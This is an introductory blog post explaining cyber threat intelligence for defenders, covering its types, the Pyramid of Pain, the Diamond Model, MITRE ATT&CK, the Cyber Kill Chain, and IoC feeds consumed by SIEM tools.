If you want to understand the security of our company, you need to know a lot of things about it. Briefly, I’ll explain what Threat Intelligence is and why it’s essential, as well as some types.
What Is Threat Intelligence?
There is a lot of information about “threat intelligence” if we look it up on Google. It helps an organization know about the threats that have, will, or are already targeting it. This information is used to prepare for, stop, and identify cyber threats that take advantage of valuable resources.
But what does this mean? A thief is targeting all the homes in the neighborhood alone. A house was broken into after two days. How can we tell if he robs alone or with other people? Are they looking for specific people? Or do you want to find something else? It’s not clear how they get in. This is a question that we ask in the security field, and we use Threat Intelligence to help us answer it. We can use it to learn how an attacker acts and stop them from getting into our house.
For example, threat intelligence can be a huge database filled with Indicators Of Compromise. This database can link a TTP (Tactics, techniques, and procedures) to a specific attack. We will look into this more later in this article.
How Important Is It?
In the same way as before: the thief and the house. We may want to know if he is crazy, if he works alone, how he chooses which house to break into, and what tools he uses to do it. The more we know about this, the better we can set up defenses to protect, stop, and find anything that could make our house vulnerable. For example, we could pay a security guard not to leave the house alone for a long time or set up security cameras and alarms to keep an eye on the outside of the house.
Zero-Day exploits are the most dangerous ones when talking about computer systems. It helps us to stay one step ahead of them.
It takes a while for zero-day exploits to be known until they can be fixed and added to the Intelligence database and AV software (antivirus). During this Window of Vulnerability (see Figure #1), the SOC team and the Threat analysts must work hard to learn about the tools, methods, and vulnerabilities used to write automation scripts that can monitor these behaviors and keep this vulnerability from being exploited. This way, the vulnerability won’t be used. That’s why it’s so important to do!
Pyramid of Pain (for the Attacker)
“A model for the effective use of Cyber Threat Intelligence in threat detection operations, with a focus on increasing the adversaries’ cost of operations,” says the author of the paper. SANS
For example, when we want to get a “background” for a piece of malware or Trudy, we might want to look at which hosts they are using, or maybe IP Addresses, or calculate hash values for the malware. But this is all volatile information that the attackers can change very quickly.
So this pyramid shows (the right bullets) how hard it is for the attacker if we try to change things that are hard to change. It’s hard for them to change tools or have a very different TTP. That’s why the threat intelligence tries to minimize the damage and figure out how Trudy will act so that we can improve our IDS and IPS, and other tools.
It’s not clear how we can get to the top of that pyramid, though There are many ways to get these things:
- Set up your honeypot networks to learn more about the techniques.
- Understand system artifacts by reverse engineering malware.
- Make use of a dark web monitoring service.
Threat Intelligence Types
There are four types of threat intelligence, and each one focuses on a different part of the process, from the strategic part to the operational part, so they all work together. Let’s look at these things in more detail now:
- Technical – Each IP Address, URL, and the hash value is called a “Hash Value.” This can come from thread feeds or honey pot attacks and malware analysis. In a nutshell, it gives information about the attacker’s resources used to make the attack. You can also use threat hunting in your SOC to look for this kind of thing.
- Tactical – TTP, procedures, toolkits, exploits, and frameworks used by cyber security professionals to learn about the technical abilities and goals of the attackers as well as the attack vectors. You can use correlation and detection in your SOC to help you with this type of thing, too.
- Operational – This is all about how people think, and it gives more information than specific threats to the company. For example, threats, malware campaigns, and so on can help you make predictions.
- Strategic – It has to do with high-level information about cyber security posture, threats, and the cost of cyber activities. It is mainly in a report that mostly talks about business at a high level. This is where you can plan your defense.
Intrusion Analysis Models & Attack Frameworks
There are a lot of different models, like the MITRE, Cyber kill of Chain, and Diamond models, that can help you understand the TTP and do intrusion analysis. The good news is that you don’t have to choose one of them. They are all good together!
Diamond Model: This is an Intrusion Analysis Model that helps you understand the intrusions in your environment by applying scientific principles to intrusion analysis: measurement, testability, and repeatability. This model is called the Diamond Model. The thing is that it looks simple, but it isn’t effortless.
The Diamond looks like figure #4 below. In this figure, the Adversary is the attacker, and the capability is what the attackers use, like exploits, malware, or anything else that will hurt your system. An IP address, domain name, email address, and so on are all examples of “infrastructure.” It can also be an asset, a person, or an email chain that is the person who gets scammed.
This means that the Adversary uses infrastructure and also develops the ability. Victims are exploited by their skills and connections to the infrastructure.
It is perfect because it helps us determine who the attacker was, who the victim was, what part of the infrastructure they used, and how they did it.
A framework that identifies points of intrusion and assists us in understanding the methods used to move around, making it ideal for identifying potential security techniques to prevent future attacks. It is available at https://attack.mitre.org/.
Cyber Kill Chain
It is a model for detecting and preventing cyber intrusion activity. The model identifies the adversaries’ tasks to achieve their goals. From survey to delivery and exploitation. Here’s an excellent image from the Cybots website that summarizes the seven steps:
The Consumption and Sharing of Threat Intelligence
There are many things called Indicators of Compromise (IoC) in Threat Intelligence. These things can be public (open source) or sold by different companies through a subscription bulletin service.
These are some of the places where you can get information about threats from:
- OSINT Framework
Here are a few examples of commercial ones:
- Palo Alto Netoworks AutoFocus
- IBM X-Force Exchange
- Anomali ThreatStream
To speed up the monitoring process, this threat intelligence feed can be set up to look for specific IPs or domains. ArcSight ESM or Splunk, or Q-Radar are usually used to look at all the events, information, and IoC that happen. If something looks suspicious, the Threat Analyst needs to look into what is going on and see if it is real or not.
The next post will be up soon.